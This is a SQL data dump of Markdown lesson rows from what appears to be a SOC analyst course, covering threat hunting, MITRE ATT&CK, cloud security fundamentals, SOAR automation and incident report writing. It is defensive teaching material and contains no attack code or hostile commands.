(626, 302, '## Hunting vs. Detection: What\'s the difference?\n\nIt is easy to confuse Incident Response, Detection Engineering, and Threat Hunting.\n\n### 1. Detection Engineering (The Ref)\n*   **Goal**: Automate the known.\n*   **Process**: \"I know Emotet uses this registry key. I will write a SIEM rule for it.\"\n*   **Output**: An Alert (Signature).\n\n### 2. Incident Response (The Firefighter)\n*   **Goal**: Put out the fire.\n*   **Process**: \"The SIEM alerted on Emotet! Delete it! Isolate the host!\"\n*   **Output**: A clean machine.\n\n### 3. Threat Hunting (The Detective)\n*   **Goal**: Find the unknown.\n*   **Process**: \"I wonder if anyone is using PowerShell to download files? There is no rule for it because admins do it too. I will filter the logs and look for anomalies.\"\n*   **Output**:\n    1.  **Nothing** (The network is clean).\n    2.  **An Incident** (I found a hacker! -> Hand off to IR team).\n    3.  **A New Rule** (I found a simplified way to detect this. -> Hand off to Detection Engineers).\n\n### The Cycle\nHunting feeds Detection.\n1.  Hunter finds a new attack pattern manually.\n2.  Hunter explains it to Detection Engineer.\n3.  Engineer writes a rule.\n4.  Now the SIEM detects it automatically.\n5.  Hunter moves on to the next unknown threat.\n\n**Hunting is not just \"looking at logs randomly\".** That is called \"log staring\" and it is useless. Hunting must be structured.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(627, 303, '## The Hunting Loop\n\nTo avoid \"Rabbit Holes\" (wasting 8 hours looking at nothing), hunters follow a loop.\n\n### 1. Hypothesis Generation\n*   Start with a question.\n*   \"If an attacker were inside, how would they move laterally?\"\n*   *Hypothesis*: \"Attackers might be using Windows Admin Shares (C$) to move between PCs.\"\n\n### 2. Data Collection & Processing\n*   \"Do I have logs for this? Yes, Windows Event 5140 (share accessed) and 5145 (detailed file share access, includes the target path).\"\n*   \"Are those events actually being generated? Both need the *Audit File Share* / *Audit Detailed File Share* subcategories enabled; they are off by default on workstations, so check before assuming coverage.\"\n*   \"Is it parsed in Splunk? Yes.\"\n\n### 3. Trigger / Investigation\n*   Run the query.\n*   \"Show me all SMB access to C$ shares.\"\n*   Result: 10,000 events. (Too many).\n*   **Filter**: \"Exclude the Backup Service Admin account.\" -> 500 events.\n*   **Filter**: \"Exclude the Domain Controllers.\" -> 50 events.\n*   **Investigate**: Look at the remaining 50. Are they normal admins?\n\n### 4. Discovery\n*   \"Wait, why is the \'Receptionist\' account accessing the CEO\'s laptop C$ share?\"\n*   **Verdict**: Malicious.\n\n### 5. Enrichment & Automation\n*   \"That was a good catch. Let\'s automate it.\"\n*   Create a rule: \"Alert if Non-IT-Admin accesses C$ share.\"\n\n### Models\n*   **The OODA Loop**: Observe, Orient, Decide, Act.\n*   **Sqrrl’s Hunting Loop**: Create Hypothesis -> Investigate -> Uncover Patterns -> Enrich Analytics.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(628, 304, '## Hypothesis-Driven Hunting\n\nThe most common and effective type of hunting. A hypothesis must be **testable**.\n\n### Good Hypothesis Examples\n*   **Intel-Driven**: \"FireEye published a report saying APT29 uses `certutil.exe` to download malware. *Hypothesis: APT29 is doing that in our network.*\"\n*   **Situational**: \"We just fired a Sysadmin. *Hypothesis: He might have left a backdoor account.*\"\n*   **Domain-Based**: \"We have a lot of PowerShell usage. *Hypothesis: Attackers are using PowerShell Empire C2 agents hiding in plain sight.*\"\n\n### How to build a Hypothesis\nUse the **MITRE ATT&CK Framework**.\n1.  Pick a Tactic (e.g., Persistence).\n2.  Pick a Technique (e.g., Scheduled Tasks).\n3.  Form Hypothesis: \"Attackers are maintaining persistence by creating Scheduled Tasks with random names.\"\n\n### The \"Null\" Hypothesis\nIn science, you try to disprove the Null Hypothesis (\"There is no attacker\").\n*   You are trying to find evidence that rejects the idea that your network is clean.\n\n### Scenario\n*   **News**: A new zero-day in Outlook allows RCE via preview pane.\n*   **Hypothesis**: \"An attacker has exploited this zero-day against our Executives.\"\n*   **Search**: Look for `outlook.exe` spawning child processes like `cmd.exe` or `powershell.exe`.\n*   **Outcome**: Zero results.\n*   **Check the data first**: this search only works if process-creation telemetry (Event 4688 with command-line logging, Sysmon Event 1, or EDR) is actually collected from the executives\' machines. No telemetry means *blind*, not *clean*.\n*   **Conclusion**: \"We are likely clean from this specific threat *at this moment*.\" (Record this search, the data sources covered and the time window, so you don\'t repeat it tomorrow and so any coverage gap is known.)', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(629, 305, '## Data Sources for Hunting\n\nYou generally need three types of data to hunt effectively.\n\n### 1. Process Execution (Endpoint is King)\n*   **What**: Windows Event 4688 / Sysmon Event 1 / EDR Data.\n    *   4688 only carries the command line if *Audit Process Creation* is on **and** the \"Include command line in process creation events\" policy is enabled; without it you see the image name and little else.\n*   **Why**: Shows exactly what ran.\n*   **Hunt**:\n    *   \"Show me processes running from `Temp` or `Downloads` folders.\"\n    *   \"Show me `svchost.exe` without a parent of `services.exe`.\"\n\n### 2. Network Connections (The Wire)\n*   **What**: Firewall logs, Proxy logs, DNS logs.\n*   **Why**: Shows C2 and Exfiltration.\n*   **Hunt**:\n    *   \"Show me long connections (> 4 hours).\"\n    *   \"Show me connections to countries where we have no business.\"\n    *   \"Show me user laptops connecting directly to other user laptops (Peer-to-Peer lateral movement).\"\n\n### 3. Authentication Logs (Identity)\n*   **What**: Windows 4624/4625, VPN logs, Entra ID (Azure AD) Sign-ins.\n*   **Why**: Shows stolen credentials.\n*   **Hunt**:\n    *   \"Show me a user logging in from 2 different cities in 1 hour.\"\n    *   \"Show me a Service Account logging in interactively (Service accounts should be batch/service types, not humans typing passwords).\"\n\n### Quality vs. Quantity\nMore logs is not always better.\n*   **Retention**: Hunting requires history. If you only keep 7 days of logs, you can\'t find an attacker who got in last month.\n*   **Granularity**: Firewall logs that only show \"Block\" are of limited use for hunting (they mostly record noise that never got in). You need the \"Allow\" logs to find the successful attacker.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(630, 306, '## Hunting Techniques\n\n### 1. Stacking (Frequency Analysis)\nThe art of counting. \"Least Frequency of Occurrence\".\n*   **Concept**: Bad things are rare. Good things are common.\n*   **Method**:\n    *   Get all User-Agent strings from Proxy logs (1 million logs).\n    *   Group by User-Agent name.\n    *   Count them.\n    *   **Sort Ascending (Bottom Up)**.\n*   **Start**:\n    *   `Mozilla/5.0...` (Count: 900,000) -> Legit.\n    *   `curl/7.0` (Count: 50,000) -> Devs using curl.\n    *   `Python-urllib` (Count: 5) -> **INVESTIGATE**. Why 5? Who is running Python scripts connecting to the web?\n\n### 2. Clustering\nGrouping similar objects.\n*   You have 1000 processes named `svchost.exe`.\n*   Group them by \"Parent Process\", \"Command Line Arguments\", and \"User\".\n*   Cluster A: 990 run by SYSTEM, parent services.exe. (Normal).\n*   Cluster B: 10 run by \"Bob\", parent explorer.exe. (Anomalous).\n\n### 3. Baseline Comparison\n*   \"What is normal for Monday?\"\n*   Compare this Monday\'s traffic volume to the average of the last 10 Mondays.\n*   If volume is +500%, investigate.\n\n### 4. Grouping (Long Tail Analysis)\nSimilar to stacking but looking for *unique* values in high-volume datasets.\n*   Example: Hunt for rare file extensions executed.\n    *   `.exe`, `.dll` (Normal).\n    *   `.scr`, `.pif`, `.hta` (Rare and often malicious).\n    *   If you see `invoice.scr`, it is almost certainly malware.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(631, 307, '## Module 30 Review\nThreat Hunting pushes the security posture forward.\n*   It finds what the SIEM missed.\n*   It assumes breach.\n*   It feeds new rules back into detection.\n\nNext: The map of the attacker\'s mind (MITRE ATT&CK).', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 14:20:29'),
(632, 311, '## What is MITRE ATT&CK?\n\n**MITRE ATT&CK** (Adversarial Tactics, Techniques, and Common Knowledge) is the periodic table of hacking. It is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.\n\n### Why was it created?\nBefore ATT&CK, we described threats vaguely: \"The malware infects the computer.\"\nATT&CK forces us to be specific: \"The malware achieves **Persistence** [TA0003] using **Registry Run Keys** [T1547.001].\"\n\n### The Structure\nIt is a Matrix (Grid).\n1.  **Tactics (Columns)**: The goal. (Why are they doing this? e.g., \"To steal passwords\").\n2.  **Techniques (Cells)**: The method. (How are they doing this? e.g., \"OS Credential Dumping\").\n3.  **Procedures (Details)**: The specific implementation. (e.g., \"Using Mimikatz.exe\").\n    *   This gives us the acronym **TTPs**.\n\n### Why Analysts Need It\n1.  **Standardized Language**: A distinct common language. \"T1059.001\" means the same thing to an analyst in Japan as it does to one in the USA.\n2.  **Mapping Defenses**: You can map your EDR coverage to the matrix. \"We cover 90% of Execution techniques, but only 10% of Exfiltration techniques. We need to buy a DLP tool.\"\n3.  **Threat Intelligence**: Reports say \"Group X uses T1053\". You can instantly look up T1053 (Scheduled Task) and see if you can detect it.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(633, 312, '## Tactics: The \"Why\" (The Top Row)\n\nTactics represent the **Adversary\'s Goals**. There are 14 Tactics in the Enterprise Matrix. You should memorize the flow of an attack.\n\n1.  **Reconnaissance**: Gathering info (Scanning, LinkedIn research).\n2.  **Resource Development**: Buying servers, stealing accounts.\n3.  **Initial Access**: Getting in (Phishing, Exploit).\n4.  **Execution**: Running code (`calc.exe`).\n5.  **Persistence**: Staying in (Reboot survival).\n6.  **Privilege Escalation**: Getting Root/Admin.\n7.  **Defense Evasion**: Hiding (Deleting logs, turning off AV).\n8.  **Credential Access**: Stealing passwords.\n9.  **Discovery**: Looking around (\"Where am I?\").\n10. **Lateral Movement**: Jumping to other computers.\n11. **Collection**: Gathering data needed.\n12. **Command and Control (C2)**: Talking to the boss.\n13. **Exfiltration**: Stealing the data (Sending it out).\n14. **Impact**: Destroying data (Wiping, Encrypting).\n\n**Note**: Attackers don\'t always follow this order linearly, but it is the general lifecycle.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(634, 313, '## Techniques: The \"How\" (The Cells)\n\nUnder each Tactic, there are many Techniques. A Technique is a specific way to achieve the goal.\n\n### Sub-Techniques\nIn 2020, MITRE added Sub-Techniques (T1xxx.001) because the matrix was getting too crowded.\n*   **Technique**: **Brute Force (T1110)**.\n    *   **Sub-Technique**: .001 Password Guessing.\n    *   **Sub-Technique**: .002 Password Cracking.\n    *   **Sub-Technique**: .003 Password Spraying.\n    *   **Sub-Technique**: .004 Credential Stuffing.\n\n### Example: Phishing (T1566)\n*   **Tactic**: Initial Access.\n*   **Technique**: Phishing.\n*   **Sub-Techniques**:\n    *   Spearphishing Attachment (Sending a doc).\n    *   Spearphishing Link (Sending a URL).\n    *   Spearphishing via Service (LinkedIn/WhatsApp message).\n\n### Using the Knowledge Base\nWhen you click a Technique on the MITRE website, it tells you:\n1.  **Description**: How it works.\n2.  **Procedure Examples**: Which hacker groups have used this? (e.g., \"APT28 used this in 2016\").\n3.  **Mitigations**: How to stop it (Disable RDP).\n4.  **Detection**: How to find it (Event ID 4624).\n*This is basically a cheat sheet for your job.*', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(635, 314, '## Navigating the Matrix\n\nYou will use the **MITRE ATT&CK Navigator**, a web-based tool to color-code the matrix.\n\n### Use Case 1: Threat Profiling\n*   Select \"APT29\" (The SolarWinds hackers).\n*   The Navigator highlights all techniques used by APT29 in Red.\n*   Now you know exactly what to look for to find them.\n\n### Use Case 2: Defense Coverage \"Heatmap\"\n*   Color Green: Techniques we can **Prevent** (Firewall blocks).\n*   Color Yellow: Techniques we can **Detect** (SIEM rules alerts).\n*   Color Red: Techniques we are **Blind** to (No logs).\n*   *Result*: A visual map showing your boss where to spend budget. \"Look, we are all Red in the \'Cloud\' column. We need cloud security.\"\n\n### Layers\nYou can layer views.\n*   Layer 1: Defenses.\n*   Layer 2: APT29.\n*   **Overlay**: Show where APT29 overlaps with our Red (Blind) spots. **This is your priority list**.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(636, 315, '## Using ATT&CK for Defense\n\nHow do we actually use this in the SOC?\n\n### 1. Alert Enrichment\nWhen an alert fires in the SIEM, tag it with the T-Code.\n*   Bad: \"Alert: PowerShell detected.\"\n*   Good: \"Alert: **T1059.001** PowerShell Execution detected.\"\n*   Why? This allows you to run metrics later. \"We saw 500 T1059 alerts this month.\"\n\n### 2. Gap Analysis\n*   \"We have 50 SIEM rules.\"\n*   Map them to ATT&CK.\n*   \"Oh, wait. 49 of them are for **Malware** (Execution), and 1 is for **Phishing**. We have ZERO rules for **Exfiltration**.\"\n*   Action: Write rules for Exfiltration.\n\n### 3. Adversary Emulation (Red Teaming)\n*   Instead of just \"pentesting\" (finding random bugs), tell the Red Team: \"Emulate **Fin7**.\"\n*   The Red Team will look up Fin7\'s ATT&CK profile and use *only* those techniques.\n*   This tests if your SOC can catch that specific threat actor.\n\n### The Pyramid of Pain Connection\nMITRE ATT&CK focuses on TTPs (The top of the pyramid). If you defend against Techniques (e.g., \"Block all unsigned usage of PowerShell\"), you stop *every* attacker who uses PowerShell, not just one specific script.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(637, 316, '## Module 31 Review\nYou have completed the Core SOC Skills.\n*   You know the workflow (IR).\n*   You know the tools (SIEM, EDR, IDS).\n*   You know the map (ATT&CK).\n\nNext: Cloud Security and Automation (The future of SOC).', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 14:20:29'),
(638, 321, '## Cloud Service Models: Who manages what?\n\nTo secure the cloud, you must understand the \"Pizza-as-a-Service\" analogies.\n\n### 1. On-Premises (Traditional IT)\n*   **Concept**: You own everything. The building, the AC, the servers, the cables, the OS, the App.\n*   **Pizza**: You buy flour, cheese, an oven, gas, and make the pizza at home.\n*   **Security**: You are responsible for 100% of the stack.\n\n### 2. IaaS (Infrastructure as a Service)\n*   **Concept**: You rent the hardware (VMs). Amazon manages the data center and the hypervisor. You manage the OS and up.\n*   **Pizza**: You buy a frozen pizza (App) and bake it in a rented oven (Infrastructure).\n*   **Examples**: AWS EC2, Azure VM, Google Compute Engine.\n*   **Security**: You must patch Windows/Linux. Amazon secures the physical building.\n\n### 3. PaaS (Platform as a Service)\n*   **Concept**: You just bring your code. The provider manages the Hardware AND the OS.\n*   **Pizza**: You order pizza delivery.\n*   **Examples**: AWS Lambda, Azure SQL Database, Google App Engine, Heroku.\n*   **Security**: You secure your *Code* and *Identity*. You cannot patch the OS (AWS does it).\n\n### 4. SaaS (Software as a Service)\n*   **Concept**: You just use the software.\n*   **Pizza**: You go to a restaurant.\n*   **Examples**: Gmail, Salesforce, Dropbox, Slack.\n*   **Security**: You only manage **Access** (Who can log in?) and **Data** (What files do we upload?).\n\n### Why this matters for the SOC?\nIf you get an alert for a SaaS app (Salesforce), checking the \"CPU usage\" is impossible. You have no server access. You can only check \"Login Logs\".\nIf you get an alert for IaaS (EC2), you *can* check CPU usage and likely have Shell access.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(639, 322, '## The Shared Responsibility Model\n\nThis is the most critical concept in Cloud Security. It answers: **\"If we get hacked, whose fault is it?\"**\n\n### The Line in the Sand\n*   **Cloud Provider (AWS/Azure)**: Responsible for security **OF** the Cloud.\n    *   Physical security (Guards, Fences).\n    *   Power/Cooling.\n    *   Hypervisor vulnerabilities.\n    *   Network cabling.\n*   **Customer (You)**: Responsible for security **IN** the Cloud.\n    *   Your Data.\n    *   Your User Accounts (IAM).\n    *   Your OS Patches (for IaaS).\n    *   Your Firewall Rules (Security Groups).\n\n### The \"S3 Bucket\" Scenario\n*   **Scenario**: A company leaves an S3 bucket (storage folder) \"Public\". Hackers steal 1 million customer records.\n*   **Who is at fault?** The Customer.\n*   **Why?** AWS gave you the tools to make it private. You chose (or forgot) to make it public. AWS secured the hard drive so no one could steal the physical disk, but they cannot stop you from publishing your own data. (Since 2023 new buckets ship with *Block Public Access* on by default; switching it off is still your decision, and the account-level setting is the guardrail worth enforcing.)\n\n### The Variance\nThe line moves based on the service model.\n*   **IaaS**: You do more work (Patching, Antivirus).\n*   **SaaS**: You do less work (Just Identity/Data).\n\n### SOC Implications\nIn the cloud, **Identity is the new Perimeter**.\n*   In On-Prem, we trusted people inside the firewall.\n*   In Cloud, there is no firewall around the API. If an attacker steals an API Key or Admin Password, they *are* the Admin.\n*   Therefore, **MFA (Multi-Factor Authentication)** is the single most important control for human sign-ins. Remember that long-lived access keys and service-principal secrets bypass MFA entirely: prefer short-lived credentials (roles, STS, workload identity), inventory static keys, and rotate or remove them.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(640, 323, '## AWS Security Fundamentals\n\nSince AWS is the biggest player, let\'s look at its core security services. (Azure/GCP have equivalents).\n\n### 1. IAM (Identity and Access Management)\nThe gatekeeper.\n*   **Users**: People (Bob).\n*   **Roles**: Hats that people/machines wear.\n    *   *Best Practice*: Don\'t bake long-lived access keys into an EC2 instance. Give it a **Role** allowing access to S3; the credentials are then short-lived and rotated for you.\n*   **Policies**: JSON documents defining rules.\n    *   `Effect: Allow`, `Action: s3:GetObject`, `Resource: my-bucket/*`.\n*   **Principle of Least Privilege**: Give only the permissions needed. Nothing more. Wildcards (`Action: \"*\"`, `Resource: \"*\"`) are the first thing to hunt for in a policy review.\n\n### 2. CloudTrail (The Black Box)\n*   **What**: Logs API calls made in the account.\n*   **Example**: \"User \'Alice\' called \'TerminateInstance\' on server i-12345 at 2 PM from IP 1.2.3.4\".\n*   **Caveat**: *management* events (IAM changes, instance launches) are logged by default. *Data* events (S3 object reads/writes, Lambda invocations, DynamoDB item access) are **not**; you must enable them per trail or you will have no record of the actual data theft. Also send the trail to a separate, locked-down logging account so an attacker with admin cannot delete it.\n*   **SOC Use**: This is your primary log source for investigation.\n\n### 3. GuardDuty (The IDS)\n*   **What**: Threat Detection service.\n*   **How**: Analyzes CloudTrail, VPC Flow Logs (Network), and DNS logs using ML.\n*   **Alerts**: \"EC2 instance is mining Bitcoin\", \"API Key used from Tor Node\".\n\n### 4. Security Groups (The Firewall)\n*   **What**: Stateful firewall for EC2 instances.\n*   **Rules**: \"Allow Port 80 from Anywhere\". \"Allow Port 22 from Office IP only\".\n*   **Common Mistake**: `0.0.0.0/0` on Port 22 (SSH open to the world; expect brute-force attempts within minutes of launch, and a compromise if a weak password or leaked key is in play).\n\n### 5. VPC (Virtual Private Cloud)\n*   Your isolated network slice of the cloud.\n*   **Public Subnet**: Can talk to Internet.\n*   **Private Subnet**: Only talks internally (Database).\n*   **NACL**: Stateless firewall at the subnet level.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(641, 324, '## Azure Security Fundamentals\n\nMicrosoft Azure is massive in the corporate world. It is tightly integrated with Active Directory.\n\n### 1. Entra ID (Formerly Azure AD)\nThis is NOT just Active Directory in the cloud. It is a completely different identity system using OIDC/SAML protocols.\n*   **Conditional Access**: \"If user is Admin AND location is China -> Block.\"\n*   **PIM (Privileged Identity Management)**: \"Just-in-Time\" admin access. You aren\'t Admin 24/7. You request admin access for 1 hour to fix a server, then it expires.\n\n### 2. Azure Sentinel (The SIEM)\nCloud-native SIEM. (Covered in Module 22).\n\n### 3. Defender for Cloud (ASC)\n*   **CSPM (Cloud Security Posture Management)**: Scans your account for bad configs.\n    *   \"Hey, you have an SQL Database with no encryption.\"\n    *   \"Hey, you have `0.0.0.0` on your VM.\"\n*   **Secure Score**: Gamifies security. \"Your score is 45%. Turn on MFA to get +10 points.\"\n\n### 4. NSG (Network Security Group)\nThe equivalent of AWS Security Groups. Content firewall rules.\n\n### 5. Log Analytics Workspace\nThe central bucket where all logs (VMs, Firewalls, Entra ID) are dumped for querying (using KQL).', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(642, 325, '## Cloud Misconfigurations\n\nAttacking the cloud is rarely about \"Zero Day Exploits\". It is about finding **Misconfigurations**.\nAccording to Gartner, 99% of cloud breaches are the customer\'s fault.\n\n### Top Misconfigurations\n1.  **Public Storage Buckets**: S3 buckets set to \"Public Read\".\n2.  **Over-Permissive IAM**: Giving a user `AdministratorAccess` instead of just `S3ReadOnly`.\n3.  **Open Security Groups**: Allowing SSH (Port 22) from `0.0.0.0/0` (The whole internet).\n4.  **Disabled Logging**: Turning off CloudTrail. (Now you have no evidence).\n5.  **Exposed Keys**: Hardcoding AWS Access Keys in GitHub code.\n\n### CSPM (Cloud Security Posture Management)\nTools like **Wiz**, **Prisma Cloud**, or **AWS Security Hub** that scan for these mistakes automatically.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 14:21:21'),
(643, 326, '## Module 32 Review\nCloud Security is about Identity and Configuration.\n*   **IaaS/PaaS/SaaS** dictates what you own.\n*   **Shared Responsibility**: You verify the lock; Provider verifies the door.\n*   **Misconfigurations** are the #1 enemy.\n\nNext: Automating the boring stuff (SOAR).', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 14:21:21'),
(644, 331, '## Why Automate Security?\n\nThe SOC is drowning.\n*   **Alert Volume**: 10,000 alerts/day.\n*   **Staff**: 5 Analysts.\n*   **Math**: Impossible.\n\n### The Solution: SOAR (Security Orchestration, Automation, and Response)\nSOAR tools replace manual, repetitive clicks with code.\n\n### Benefits\n1.  **Speed**: A human takes 20 minutes to block an IP on 10 firewalls. A script takes 1 second.\n2.  **Consistency**: Humans make typos. Scripts do exactly what they are told.\n3.  **Morale**: No analyst wants to spend 8 hours resetting passwords. Automate the boring stuff so analysts can hunt.\n\n### The \"O\" in Orchestration\nConnecting different tools.\n*   \"Take the IP from Splunk.\"\n*   \"Check it in VirusTotal.\"\n*   \"Send a Slack message.\"\n*   \"Add to Palo Alto firewall.\"\nThese tools don\'t talk to each other natively. SOAR is the glue (API Connector).\n\n### Risks of Automation\n**Automating a bad process just breaks things faster.**\n*   *Bad Rule*: \"Block any IP that fails login 5 times.\"\n*   *Scenario*: CEO forgets password.\n*   *Automation*: Blocks the entire office NAT IP.\n*   *Result*: Fireable offense.\n*   *Fix*: Always have a \"Human in the Loop\" for destructive actions until you are 100% sure.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(645, 332, '## SOAR Platforms Overview\n\n### 1. Palo Alto XSOAR (Demisto)\nThe market leader.\n*   Uses a drag-and-drop playbook editor.\n*   Thousands of integrations.\n*   \"War Room\" feature where chat and commands are mixed.\n\n### 2. Splunk SOAR (Phantom)\n*   Tightly integrated with Splunk.\n*   Python-centric.\n\n### 3. Tines\n*   The modern, lightweight challenger.\n*   No-code. Looks like a flowchart. Very popular because it is easy to learn.\n\n### 4. Microsoft Logic Apps / Sentinel\n*   If you use Sentinel, you create \"Playbooks\" using Logic Apps.\n*   Very cheap and powerful for Azure environments.\n\n### The Workflow of a Playbook\n1.  **Trigger**: New Alert from SIEM.\n2.  **Enrichment**:\n    *   Query threat intel (VirusTotal).\n    *   Query LDAP (Get user\'s manager).\n3.  **Decision (Condition)**:\n    *   Is it Malicious? (VirusTotal > 5/70).\n4.  **Action**:\n    *   If Yes -> Isolate Host.\n    *   If No -> Close Ticket as False Positive.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(646, 333, '## Playbook Design\n\nA **Playbook** is the coded logic of a Standard Operating Procedure (SOP).\n\n### Common Logic Blocks\n1.  **Trigger**: New Phishing Alert.\n2.  **Action**: Extract URL.\n3.  **Enrichment**: Check URL reputation (VirusTotal).\n4.  **Decision (Software)**:\n    *   If VT Score > 5: **BLOCK** and Close Ticket.\n    *   If VT Score < 5: Ask Analyst to review.\n\n### Human-in-the-Loop\nYou don\'t automate *everything*. \nCritical decisions (e.g., \"Shut down the CEO\'s laptop\") should prompt a human for \"Yes/No\" approval via Slack/Email.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 14:21:21'),
(647, 334, '## Common Automation Use Cases\n\nWhere should you start automating?\n\n### 1. Phishing Triage (The #1 Time sink)\n*   **Manual**: Analyst opens email, extracts URL, checks URLScan.io, checks sender IP... (15 mins).\n*   **Automated**: User forwards email to `phish@company.com`. SOAR extracts artifacts, scans them, and only alerts the analyst if it finds a malicious link. (0 mins human time for clean emails).\n\n### 2. Malware Containment\n*   **Trigger**: EDR detects Ransomware.\n*   **Action**: Automatically isolate the host via API call to EDR.\n*   **Why**: Speed is critical. If you wait 20 minutes for a human to see the ticket, the whole network is encrypted.\n\n### 3. User Onboarding/Offboarding\n*   **Trigger**: HR system says \"Bob is fired\".\n*   **Action**: Disable Active Directory account, revoke VPN, wipe mobile device.\n\n### 4. Threat Intel Management\n*   **Trigger**: New IOC list from CISA.\n*   **Action**: Push IPs to firewall blocklist automatically.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(648, 335, '## Python for Security Automation\n\nYou don\'t need to be a Developer, but you must know how to Script. **Python** is the language of Security.\n\n### Why Python?\n*   **Libraries**: `requests` (HTTP), `pandas` (Data), `boto3` (AWS).\n*   **Readability**: Easy to read code.\n*   **APIs**: Almost every security tool has a REST API, and Python is great at talking to APIs.\n\n### Key Concepts for SOC\n1.  **JSON Parsing**: Every API returns JSON. You need to know how to dig into dictionaries within lists. `data[\'alerts\'][0][\'source_ip\']`.\n2.  **Requests**: `response = requests.get(url, headers=api_key)`.\n3.  **Regex**: Extracting IPs from text blobs.\n\n### Example Script Idea\n*   Input: `suspicious_ips.txt`.\n*   Loop: For each IP...\n*   Action: Check AbuseIPDB API.\n*   Logic: If confidence > 90...\n*   Output: Write to `firewall_blocklist.csv`.\n\n**Lab Tip**: In this module\'s lab, you will write a simple script to parse a log file. Do not fear the code; it is just logic written in text.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:18'),
(649, 336, '## Module 33 Review\nAutomation is a force multiplier.\n*   **SOAR**: The platform for automation.\n*   **Playbooks**: The logic charts.\n*   **Outcome**: Faster response, happier analysts.\n\nNext: The final skill - Communication (Reporting).', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 14:21:21'),
(650, 341, '## Why Documentation Matters\n\nIf you didn\'t document it, it didn\'t happen.\nIn a legal case, your notes are evidence.\n\n### Who reads your report?\n1.  **Other Analysts**: \"Has this happened before?\"\n2.  **Your Boss**: \"Is the team busy? Do we need more budget?\"\n3.  **The Auditors**: \"Did you follow the process?\"\n4.  **The Lawyers**: \"Did we exercise due diligence?\"\n\n### Types of Documentation\n*   **Ticket Notes**: Rough, real-time notes inside the case.\n*   **Incident Reports**: Formal summary after the fact.\n*   **Runbooks/SOPs**: Instructions on *how* to do things.\n*   **Change Logs**: Records of system modifications.\n\n### The Bus Factor\nIf you are the only one who knows how the firewall works, and you get hit by a bus (or win the lottery), the company fails. Documentation increases the \"Bus Factor\".', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 16:11:18'),
(651, 342, '## Incident Timelines\n\nThe most critical part of an Incident Report.\n\n### Precision is Key\n*   **Bad**: \"The hacker got in around noon.\"\n*   **Good**: \"12:01:45 PM UTC - Attacker IP 1.2.3.4 successfully authenticated.\"\n\n### UTC vs Local Time\n**ALWAYS USE UTC**.\n*   Attacker is in Russia (+3).\n*   Server is in AWS (+0).\n*   Analyst is in New York (-5).\n*   Management is in California (-8).\nUsing local time creates a disaster. Standardize on UTC.', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(652, 343, '## Writing Effective Reports\n\n### Know Your Audience\n1.  **Technical Audience (CTO, Engineers)**:\n    *   Wants: IP addresses, Hashes, root cause, exact commands used.\n    *   Tone: Precise, technical.\n2.  **Executive Audience (CEO, Board)**:\n    *   Wants: Risk level, Financial impact, \"Is it fixed?\", \"How do we prevent it?\"\n    *   Tone: High-level, money-focused. **No jargon**.\n    *   *Bad*: \"The APT used a Heap Spray exploit.\"\n    *   *Good*: \"Sophisticated attackers compromised a web server.\"\n\n### The 5 W\'s\n*   **Who** (Attacker/Victim)?\n*   **What** (Happened)?\n*   **When** (Timeline)?\n*   **Where** (Systems)?\n*   **Why** (Motive)?', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(653, 344, '## Effective Report Writing: The Executive Summary\n\nThe most important part of any report is the first page. Executives will **only** read the first page.\n\n### The BLUF (Bottom Line Up Front)\nStart with the conclusion.\n*   **Bad**: \"On Monday we saw a log. Then we looked at it. It was weird...\"\n*   **Good**: \"We prevented a Ransomware attack on the Finance Server. No data was lost. 1 laptop is currently being reimaged.\"\n\n### Key Elements of Exec Summary\n1.  **What happened?** (High level).\n2.  **What was the impact?** (Data lost? Money lost? Downtime?).\n3.  **What did we do?** (Fixed it?).\n4.  **What is the risk now?** (Safe? Controlled?).\n5.  **What do we need?** (Approval to buy x?).\n\n### Language\nAvoid jargon.\n*   *No*: \"The APT initiated a C2 beacon via DNS tunneling.\"\n*   *Yes*: \"The attacker established a hidden connection to control our server.\"\nSpeak in \"Business Risk\", not \"Technobabble\".', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 16:11:18'),
(654, 345, '## Metrics and KPIs\n\nHow do we measure the SOC\'s performance?\n\n### MTTD (Mean Time To Detect)\n*   How long does the attacker stay hidden?\n*   *Goal*: Minimize this. (World average is ~20 days. Goal is <1 hour).\n\n### MTTR (Mean Time To Respond/Remediate)\n*   Once detected, how fast do we fix it?\n*   *Goal*: Minimize this.\n\n### False Positive Rate\n*   Are we burning out analysts with bad alerts?\n\n### Dwell Time\n*   Total time the adversary had access.\n\nGood metrics drive budget. \"Our MTTD dropped 50% since we bought Tool X.\"', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
